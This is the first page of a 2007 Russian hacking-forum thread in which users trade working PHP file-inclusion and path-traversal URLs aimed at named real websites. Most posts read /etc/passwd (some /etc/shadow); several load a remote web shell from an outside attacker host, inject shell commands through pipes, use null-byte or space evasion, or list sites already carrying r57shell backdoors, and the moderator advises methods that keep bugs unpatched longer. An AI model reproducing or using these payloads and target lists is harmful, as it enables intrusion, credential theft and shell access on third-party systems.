Форум АНТИЧАТ
Страница 1 из 29 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   PHP Иньекции (https://forum.antichat.xyz/showthread.php?t=38443)

Joker-jar 20.04.2007 18:15
PHP Иньекции
 
XSS, SQL inj нашел, а вот инклудинга в упор не вижу...
Код:
http://www.rupivo.ru/papers.php?file=../../../../../../etc/passwd
http://quake.olympus.ru/q3/playerstat.php?config=../../../../../../../etc/passwd

guest3297 20.04.2007 19:33
Проведем тест прекрепляю тему на неделю если будет такая же активность как sql Иньекции оставляю.

+Постим только:
+php/perl/jsp иньекции.
+Исполнение произвольного кода.
+Исполнение произвольных команд.

+Статья php injection(http://forum.antichat.ru/thread12123.html).

+За флуд буду строго наказывать.
+Не забываем про Post метод, если пользоваться Post методом то баги буду дольше жить. Подробности тут(http://forum.antichat.ru/thread24973.html).

При удаленных инклудах
Постим так:
Цитата:
http://site.com/index.php?page=[url]

VampiRUS 21.04.2007 04:04
Цитата:
http://www.giga-hamburg.de/index.php?file=../../../../../../../../../../../../../etc/passwd&folder=giga
запостю, только чёт я не уверен что будет такая же активность.

InferNo23 21.04.2007 10:55
Код:
http://primotechnology.com/index.php?art=../../../../../etc/passwd
уже 210 просомтоов топика..

NOmeR1 21.04.2007 11:57
Порадовало :D
Цитата:
http://www.jff.org/download.php?file=../../../../../../etc/passwd - сохраняем и открываем

NOmeR1 21.04.2007 11:59
Цитата:
http://www.berlinpolis.de/download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем

s1mt 21.04.2007 12:01
http://www.huntington.laurentian.ca/index.php?file=../../../../../etc/passwd

V1k 21.04.2007 12:52
Удаленный инклуд:

Код:
http://www.casadelajuventud.mrg.gov.ar/principal.php?url=h://ttp://::////forum.antichat.ru/antichat/pic/logo.gif?
Немного оффтоп, стало сейчас интересно, всё ли еще можно что-то найти в гугле по запросу "r57shell - http-shell by RST/GHC":

Код:
http://www.aodaitimhue.com/nhacrock/info.php
http://www.shp-berlin.de/en/expertise.php
http://www.auschwitzdanceparty.org/conf/r57.php
http://live8x.com/images/kol.php
http://www.securitysafetysystems.com/includes/mysqlconfig.local.php
http://www.huyhoangkontum.org/h.php
http://www.sniperfoxselacome.com/index.php
http://www.hostingstar.us/rapid/ab.php
http://www.aongtr.ro/g.php
http://wwwreal-estate.com/rel-estate-info/wp-commentsrs.php

zl0ba 21.04.2007 13:08
Цитата:
http://www.webcreativestudio.com/?id=inter&param=doc_php&lang=2&doc_dop_param=../../../../../../../../etc/passwd
И просматриваем в исходном тексте =)

NOmeR1 21.04.2007 13:09
Цитата:
http://en.brazilny.org/force-download.php?file=../../../../../../etc/passwd
- сохраняем как passwd.txt и открываем

s1mt 21.04.2007 13:13
http://www.paru.cas.cz/index.php?file=../../../../../etc/passwd

NOmeR1 21.04.2007 13:17
Цитата:
http://www.lisboncouncil.net/force-download.php?file=/../../../../../../etc/passwd
сохраняем как passwd.txt и открываем

NOmeR1 21.04.2007 13:19
Цитата:
http://www.evolutionbook.com/eBook/Download.php?file=../../../../../../etc/passwd
сохраняем как passwd.txt и открываем

xaxxer 21.04.2007 13:19
http://www.njff.no/index.php?file=../../../../../etc/passwd

NOmeR1 21.04.2007 13:32
Цитата:
http://adee.dental.tcd.ie/index.php?file=../../../../../../etc/passwd
:D

zl0ba 21.04.2007 13:44
Цитата:
http://www.planet-travel.ru/index.php?file=../../../../../../../etc/passwd
0o

guest3297 21.04.2007 14:11
Так Хорошо одобряю пока данную активность.

http://robo-host.ru/bill/index.php?lang=../../../../../../../../../../../../../etc/passwd%00

iv. 21.04.2007 15:01
Код:
http://www.tinform.ru/price.php?file=../../../../../etc/passwd
хотел у них акустику прикупить, передумал =)

s1mt 21.04.2007 15:35
http://inet-sell.de/shop/catalog/elmar_start.php?file=../../../../../../../../etc/passwd

NOmeR1 21.04.2007 17:24
Держите :
Цитата:
http://www.fz-juelich.de/portal/index.php?path=../../../../../../etc/passwd
Скоро ещё будет :) :)

NOmeR1 22.04.2007 10:02
Смеялсо :D
Цитата:
http://www.uploadpics.net/source.php?file=../../../../../../etc/passwd

NOmeR1 22.04.2007 10:08
melosi.it
Цитата:
http://www.melosi.it/script/source.php?FILE=../../../../../../etc/passwd

NOmeR1 22.04.2007 10:13
Вот здесь дофига всего :)
Цитата:
http://www.foundationsofhope.com/modules.php?op=modload&name=phpbb2&file=../../../../../../../../../etc/passwd

NOmeR1 22.04.2007 10:14
И тут немного
Цитата:
http://michaelsleman.com/projects/php/index.php?file=../../../../../../etc/passwd

NOmeR1 22.04.2007 10:28
Вот ещё =)
Цитата:
http://www.mmon.org/view.php?file=../../../../../../../etc/passwd

ssk.ex0.uf0 22.04.2007 11:13
Код:
http://www.sakhiepi.ru/news/view_article.php?num=/etc/passwd
=)

Robin_Hood 22.04.2007 12:33
http://www.stumbleupon.com/etc/passwd
http://cvsweb.csociety.org/cgi-bin/cvsweb/etc/passwd?rev=1.3

s1mt 22.04.2007 12:56
http://www.bookladder.com/viewpage.php?file=../../../etc/passwd

[53x]Shadow 22.04.2007 19:26
Вот и моя первая ;)
Огромный файл:

Код:
http://blog.tice.de/beitrag.php?file=../.. /../../../../etc/passwd
И сразу вторая ;)

Код:
http://www.mcxapc.org/static.php?file=../../.. /../../../etc/passwd
Не забываем про пробелы!

NOmeR1 22.04.2007 20:48
Ух, что я нашёл!
www.cs.wright.edu

Цитата:
http://www.cs.wright.edu/~pmateti/InternetSecurity/Lectures/Password/etc-passwd.txt
Правдо это не php-inj =)

NOmeR1 22.04.2007 21:27
Welcome to Taverna 1.5.1
Цитата:
http://taverna.sourceforge.net/index.php?doc=../../../../../../../etc/passwd
:) :)

На сегодня закончу с PHP inj :)

n1†R0x 22.04.2007 22:38
интересная тема

удаленный инклуд =)
Код:
http://www.oscar.com.ua/index.php?action=[url]
инклуд шелла c99
ps: etc/passwd большой :)

KPOT_f!nd 23.04.2007 00:07
Цитата:
http://uw-gezondheid.nl/Producten/aloe.php?inc=http://attack.jino-net.ru/shell.txt
http://www.haus-bei-berlin.de/index.php?cont=http://attack.jino-net.ru/shell.txt?
http://www.mlodzi.org.pl/index.php?file=/etc/passwd
http://www.imperioargentino.com.ar/superseinfeld/index.php?cont=http://attack.jino-net.ru/shell.txt?
http://www.blumenmock.de/hauptt.php?incl=http://attack.jino-net.ru/shell?
http://iaald.org/cee/index.php?page=http://attack.jino-net.ru/shell?
http://www.openworld.ru/school/m.cgi?f=../../../../../../../../../../../../../etc/passwd
http://132.229.155.188/DBWP/index.php?file=../../../../../../../../../../../../../etc/passwd&menu=no
http://www.njff.no/index.php?file=../../../../../../../../../../../../../../../../etc/passwd&object_id=32655
http://www.paru.cas.cz/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.slope.org/archive/issue18/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../../../../../../../etc/passwd&knap=6
http://dbis.informatik.uni-freiburg.de/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://my.pchome.net/help/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.photo-forum.fr/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.sphaerentor.com/tolkien/index.php?file=/etc/passwd
http://sognogfjordane.njff.no/index.php?file=../../../../../../../../../../../../../../../../etc/passwd&nav_expand=1328&oid=1328&&expand
http://www.infocentrum.opava.cz/index2.php?file=http://attack.jino-net.ru/shell.txt?
мой мини-вклад

NOmeR1 23.04.2007 00:59
Цитата:
http://www.ufw.org/_page.php?inc=../../../../../../../etc/passwd
http://www.durangotelegraph.com/telegraph.php?inc=../../../../../../etc/passwd
http://www.5nr.org/topside/profiles.php?inc=../../../../../../etc/passwd
http://www.venturesnowboards.com/index.php?inc=../../../../../../../../etc/passwd
http://www.rtvpink.com/tvlica/tvlica.php?inc=../../../../../../etc/passwd
http://www.dogbrothers.com/wrapper.php?file=../../../../../../etc/passwd
http://www.neuvm.org/include.php?include=../../../../../../etc/passwd
http://www.printgroupusa.com/index.php?include=../../../../../../etc/passwd
http://www.spa-nyc.com/custompage.php?include=../../../../../../etc/passwd
Это всё :)

[dword] 23.04.2007 01:26
Код:
http://www.vdgb.ru/?action=../../../../../../etc/passwd/

KPOT_f!nd 23.04.2007 01:58
Цитата:
http://reloadcms.com/main/?module=../../../../etc/passwd
http://wwwisis.ufg.edu.sv/wwwisis/cgi-bin/Nadqs2.cgi?pagina=../../../../../../../../../../../../bin/ls%20-la|
http://bioweb.franko.lviv.ua/biophys/index.php?lang=ua&file=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc%2Fpasswd
http://bioweb.franko.lviv.ua/biophys/index.php?lang=ua&file=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc%2Fshadow
http://www.totalpconline.com/taginspectoraddin/?page=../../../../etc/passwd
http://www.greenvilleumc.org/contact/index.php?page=../../../../etc/passwd
http://www.gfrlaw.com/recruiting/index.cgi?file=|cat%20../../../../etc/passwd|
http://www.bookladder.com/viewpage.php?file=../../../../../../../../etc/passwd
http://www.user.tcp.de/viewpage.php?file=../../../../../../../../etc/passwd
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/passwd
http://forum-niederrhein.de/forum/cgi-bin/wps/xtra.cgi?filename=../../../../../../../../../etc/passwd
http://trichotomy.ca/cgi-bin/printcode.pl?filename=../../../../../../../../../etc/passwd
http://itsuji.net/brushes/index.php?x=../../../../etc/passwd
инклуды еще в моде!

guest3297 23.04.2007 02:54
Правила темы!!!
 
При удаленных инклудах
Постим так:
Цитата:
http://site.com/index.php?page=[url]

NOmeR1 23.04.2007 17:12
Локальные инклуды
Цитата:
http://www.weng.at/kirchenwirt/index.php?incl=../../../../../../etc/passwd
http://www.ktgracing.nl/uitslagen/index.php?incl=../../../../../../../etc/passwd
http://www.mdarui.com/index.php?incl=../../../../../../etc/passwd
Самая простая статья по PHP inj здесь - http://forum.antichat.ru/thread12123.html. Спс грин биру :)

zl0ba 23.04.2007 17:20
Цитата:
http://www.reichenthal.at/pages/service-include.php?incl=../../../../etc/passwd
Вроде не было... Надо задуматься уже о написании АнтиБаяна.

NOmeR1 23.04.2007 17:44
Удалённый инклуд (вроди бы :) )
Цитата:
http://www.digital-imogen.net/index.php?href=[url]
И ещё раз локальный
Цитата:
http://www.gck.geoid.de/table.php?href=../../../../../../etc/passwd
http://www.offinet.com/info/help/multiview.php?href=../../../../../../etc/passwd


Время: 02:19
Страница 1 из 29 1 2 3 4 5 11 > Последняя »
Показывать 40 сообщений этой темы на одной странице